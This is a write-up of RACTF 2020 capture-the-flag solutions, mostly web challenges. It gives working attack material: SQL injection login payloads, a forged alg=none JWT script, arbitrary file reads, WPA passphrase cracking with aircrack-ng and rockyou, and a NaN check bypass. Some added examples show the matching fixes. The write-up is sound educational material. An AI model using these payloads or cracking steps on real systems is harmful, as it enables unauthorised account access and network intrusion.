[RACTF 2020]Write-Up

The web challenges were all fairly easy.


C0llide?

The source is provided:

const bodyParser = require("body-parser")
const express = require("express")
const fs = require("fs")
const customhash = require("./customhash")

const app = express()
app.use(bodyParser.json())

const port = 3000
const flag = "flag"
const secret_key = "Y0ure_g01nG_t0_h4v3_t0_go_1nto_h4rdc0r3_h4ck1ng_m0d3"

app.get('/', (req, res) => {
    console.log("[-] Source view")
    res.type("text")
    return fs.readFile("index.js", (err,data) => res.send(data.toString().replace(flag, "flag")))
})

app.post('/getflag', (req, res) => {
    console.log("[-] Getflag post")
    if (!req.body) {return res.send("400")}
    let one = req.body.one
    let two = req.body.two
    console.log(req.body)
    if (!one || !two) {
        return res.send("400")
    }
    if ((one.length !== two.length) || (one === two)) {
        return res.send("Strings are either too different or not different enough")
    }
    one = customhash.hash(secret_key + one)
    two = customhash.hash(secret_key + two)
    if (one == two) {
        console.log("[*] Flag get!")
        return res.send(flag)
    } else {
        return res.send(`${one} did not match ${two}!`)
    }
})

app.listen(port, () => console.log(`Listening on port ${port}`))

The server never checks that one and two are strings. Just POST two JSON arrays with the same contents, e.g. {"one":["a"],"two":["a"]}: they have equal length, they are different objects so one === two is false, and string concatenation coerces both to the same text, so secret_key + one and secret_key + two are identical before hashing (a string "a" paired with the array ["a"] works the same way). Note the body must be JSON, as bodyParser.json() is the only parser mounted.

ractf{Y0u_R_ab0uT_2_h4Ck_t1Me__4re_u_sur3?}


Quarantine

Challenge description: See if you can get access to an account on the webapp.

Log in with the username ' or 1 limit 1,1-- (any password) to get the flag: the OR makes the WHERE clause match every row, the LIMIT offset selects one of them, and the comment discards the password check.

Finding server information

Challenge description: See if you can find the source, we think it's called app.py

Opening the video shows that the page fetches it through a base64-encoded value, so replace that value with the base64 encoding of app.py.

This returns the source and the flag.

Getting admin

Challenge description: See if you can get an admin account.

The JWT is accepted without a signature (alg none), so forge an admin token:

import jwt

# The server does not verify the signature, so a token with alg=none and an
# empty key is accepted. Forge the admin claims.
token = jwt.encode({"user": "admin", "privilege": 2}, key='', algorithm='none')
# PyJWT 1.x returns bytes, PyJWT 2.x returns str
if isinstance(token, bytes):
    token = token.decode('utf-8')
print(token)

Replace the session token with the forged one to get the flag.
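Why alg=none works, as an added example with no dependency on PyJWT (this is illustration code, not the challenge's server): a verifier that lets the token's own header pick the algorithm accepts an unsigned token, while one that pins the algorithm rejects it. The signing key is made up.

```python
import base64
import hashlib
import hmac
import json


def b64url(data: bytes) -> str:
    """Base64url without padding, as JWT segments use."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def segment(obj) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """A legitimately signed token, as the server would issue after login."""
    signing_input = f"{segment({'alg': 'HS256', 'typ': 'JWT'})}.{segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_none(claims: dict) -> str:
    """What jwt.encode(..., algorithm='none') produces: header says alg=none,
    the signature segment is empty, no key needed."""
    return f"{segment({'alg': 'none', 'typ': 'JWT'})}.{segment(claims)}."


def verify_insecure(token: str, key: bytes) -> dict:
    """Bug: the token's header chooses the algorithm, so alg=none means no check."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(b64url(expected), s):
            return json.loads(b64url_decode(p))
    raise ValueError("invalid signature")


def verify_safe(token: str, key: bytes) -> dict:
    """Fix: the server pins the algorithm it issues with and ignores the header's
    choice (the equivalent of PyJWT's jwt.decode(token, key, algorithms=['HS256']))."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), s):
        raise ValueError("invalid signature")
    return json.loads(b64url_decode(p))


def accepted(verifier, token: str, key: bytes) -> bool:
    """True if the verifier accepts the token, False if it raises."""
    try:
        verifier(token, key)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    KEY = b"server-secret"  # constructed; the real key is unknown and not needed
    forged = forge_none({"user": "admin", "privilege": 2})
    print(forged)
    print("insecure verifier accepts forged token:", accepted(verify_insecure, forged, KEY))
    print("pinned verifier accepts forged token:", accepted(verify_safe, forged, KEY))
```

The forged token ends in a bare dot because its signature segment is empty; a verifier that does not pin the algorithm never looks at that segment.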


Entrypoint

Challenge description:

Sadly it looks like there wasn’t much to see in the python source. We suspect we may be able to login to the site using backup credentials, but we’re not sure where they might be. Encase the password you find in ractf{...} to get the flag.

This challenge does NOT have fake flags. If you found some other flags while solving this challenge, you may have found the solutions to the next challenges first 😛

This is the first of a series of challenges on one site. The source code reveals an arbitrary file read; reading backup.txt with it gives the backup credentials, and the password is the flag.

Admin Attack

Challenge description: Looks like we managed to get a list of users. That admin user looks particularly interesting, but we don't have their password. Try and attack the login form and see if you can get anything.

A little testing shows the login form echoes SQL error messages, and the app is written in Python.

Trying various payloads, LIMIT can be used directly in the injected clause. So

' or 1 limit 1,1--+ as the username gets a flag (the + URL-decodes to a space, which the -- comment syntax requires in MySQL).

Baiting

Challenge description: That user list had a user called loginToGetFlag. Well, what are you waiting for?

Same approach as above: since the query matches every row, the LIMIT offset chooses which user you log in as, so just change the number until you land on loginToGetFlag.
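The injection used in Quarantine, Admin Attack and Baiting, replayed against a constructed SQLite table as an added example (not the challenge's code; SQLite is an assumption, the real backend may be MySQL, but LIMIT offset,count and -- comments work the same in both). It shows the string-built query that the error messages point to, why the LIMIT offset selects the account, and the parameterised query that closes the hole.

```python
import sqlite3

# Constructed sample data standing in for the site's user table.
USERS = [("admin", "correct horse"), ("loginToGetFlag", "battery staple"), ("guest", "guest")]


def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return db


def login_vulnerable(db, username: str, password: str):
    """String-built query, the pattern the leaked SQL errors point to.
    Returns the username of the account logged in as, or None."""
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    row = db.execute(query).fetchone()
    return row[0] if row else None


def login_safe(db, username: str, password: str):
    """Parameterised query: the payload is just an unknown username."""
    row = db.execute("SELECT username FROM users WHERE username = ? AND password = ?",
                     (username, password)).fetchone()
    return row[0] if row else None


def limit_payload(offset: int) -> str:
    """' or 1 limit <offset>,1--  : OR 1 matches every row, LIMIT picks one by
    offset, and the comment drops the password check that follows."""
    return f"' or 1 limit {offset},1-- "


def enumerate_accounts(db) -> list:
    """Baiting's trick generalised: step the offset until no row comes back."""
    found = []
    offset = 0
    while True:
        user = login_vulnerable(db, limit_payload(offset), "x")
        if user is None:
            return found
        found.append(user)
        offset += 1


if __name__ == "__main__":
    db = make_db()
    print("offset 1 logs in as:", login_vulnerable(db, limit_payload(1), "x"))
    print("all accounts:", enumerate_accounts(db))
    print("same payload, parameterised:", login_safe(db, limit_payload(1), "x"))
```

Without an ORDER BY the offset order is whatever the engine returns (insertion order here), which is why the write-up simply tries successive numbers.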

Insert witty name

Challenge description: Having access to the site's source would be really useful, but we don't know how we could get it. All we know is that the site runs python.

Use the same arbitrary file read to read main.py; the flag is in the source.

Vandalism

Challenge description: That admin panel was awfully bare. There must be some other page, but we've no idea where it is. Just to clarify, ractf{;)} is the greedy admins stealing all the flags, it's not the actual flag.

On logging in, the response headers reveal the hidden admin page (the /__adminPortal path used in the script below).

Viewing its source shows a hidden element whose text is a mix of non-ASCII Unicode characters and ASCII.

Write a script to walk the characters and keep only the ASCII ones:

import requests
import string

url = 'http://88.198.219.20:12539/__adminPortal'

cookie = {
    'session': 'b6cb5d28-1742-4827-a510-ebdb116ed80f'
}
printable = set(string.printable)
result = requests.get(url=url, cookies=cookie).text
# The flag is inside a hidden <h3> with non-ASCII junk mixed in: keep only that
# element's contents and drop every character outside string.printable.
hidden = result.split('<h3 style="display:none">')[1].split('</h3>')[0]
flag = ''.join(ch for ch in hidden if ch in printable)
print(flag)

Running it prints the flag.

Xtremely Memorable Listing

Challenge description: We've been asked to test a web application, and we suspect there's a file they used to provide to search engines, but we can't remember what it used to be called. Can you have a look and see what you can find?

From the challenge name (Xtremely Memorable Listing), guess that the file is XML.

So fuzz the site with an XML-file wordlist, which turns up the file.

Download the .bak copy of it.

Visiting the path it lists gives the flag.


Peculiar Packet Capture

A traffic-analysis challenge. The download turns out to be a Wi-Fi capture. Running

aircrack-ng WiFi.cap

lists the networks in the capture and gives the Wi-Fi SSID.

Then run

aircrack-ng 1.cap -w /usr/share/wordlists/rockyou.txt

to crack the WPA passphrase from the captured handshake with the rockyou wordlist; this gives the Wi-Fi password.

Decrypt the capture with it:

airdecap-ng 1.cap -e ATLAS_PMC -p nighthawk

This yields the decrypted packets. Export the PDF carried in them to get the flag.


MISC-Teleport

A Python script is provided:

import math

x = 0.0
z = 0.0
flag_x = 10000000000000.0
flag_z = 10000000000000.0
print("Your player is at 0,0")
print("The flag is at 10000000000000, 10000000000000")
print("Enter your next position in the form x,y")
print("You can move a maximum of 10 metres at a time")
for _ in range(100):
    print(f"Current position: {x}, {z}")
    try:
        move = input("Enter next position(maximum distance of 10): ").split(",")
        new_x = float(move[0])
        new_z = float(move[1])
    except Exception:
        continue
    diff_x = new_x - x
    diff_z = new_z - z
    dist = math.sqrt(diff_x ** 2 + diff_z ** 2)
    if dist > 10:
        print("You moved too far")
    else:
        x = new_x
        z = new_z
    if x == 10000000000000 and z == 10000000000000:
        print("ractf{#####################}")
        break

The script casts the input with float(). Looking up the function's documentation:

https://www.geeksforgeeks.org/float-in-python/

float() accepts not only numeric strings but also "inf" and "nan". With nan coordinates, math.sqrt(diff_x ** 2 + diff_z ** 2) is nan, and nan > 10 is False, so the move is accepted and the position becomes nan,nan. From there the next difference is nan as well, so any destination passes the check.

Testing confirms it: enter nan,nan first, then 10000000000000,10000000000000, and the flag is printed.
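The distance check from the script above with the NaN bypass replayed through it, as an added example (not the challenge's code), next to a hardened check that rejects non-finite coordinates. The move lists are constructed inputs.

```python
import math

FLAG_X = FLAG_Z = 10000000000000.0
MAX_STEP = 10.0


def move_allowed(x, z, new_x, new_z) -> bool:
    """The challenge's check as written: a move is rejected only when dist > 10.
    Every comparison with NaN is False, so a NaN distance is never rejected."""
    dist = math.sqrt((new_x - x) ** 2 + (new_z - z) ** 2)
    return not (dist > MAX_STEP)


def move_allowed_safe(x, z, new_x, new_z) -> bool:
    """Hardened check: coordinates must be finite and the distance within range.
    Writing the condition positively (dist <= MAX_STEP) also fails closed on NaN."""
    if not (math.isfinite(new_x) and math.isfinite(new_z)):
        return False
    return math.hypot(new_x - x, new_z - z) <= MAX_STEP


def play(moves, check=move_allowed) -> bool:
    """Replay raw 'x,y' inputs through the game loop; True if the flag position is reached."""
    x = z = 0.0
    for raw in moves:
        try:
            new_x, new_z = (float(v) for v in raw.split(","))
        except ValueError:  # float() failed or wrong number of fields, as in the script
            continue
        if check(x, z, new_x, new_z):
            x, z = new_x, new_z
        if x == FLAG_X and z == FLAG_Z:
            return True
    return False


# Constructed inputs: the bypass, and what happens with inf instead of nan
EXPLOIT = ["nan,nan", "10000000000000,10000000000000"]
INF_ATTEMPT = ["inf,inf", "10000000000000,10000000000000"]

if __name__ == "__main__":
    print("nan bypass, original check:", play(EXPLOIT))
    print("nan bypass, hardened check:", play(EXPLOIT, move_allowed_safe))
    print("inf attempt, original check:", play(INF_ATTEMPT))
```

inf does not work the same way: the first move has an infinite distance, and inf > 10 is True, so it is rejected; only NaN slips through, because it is neither greater than nor less than anything.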
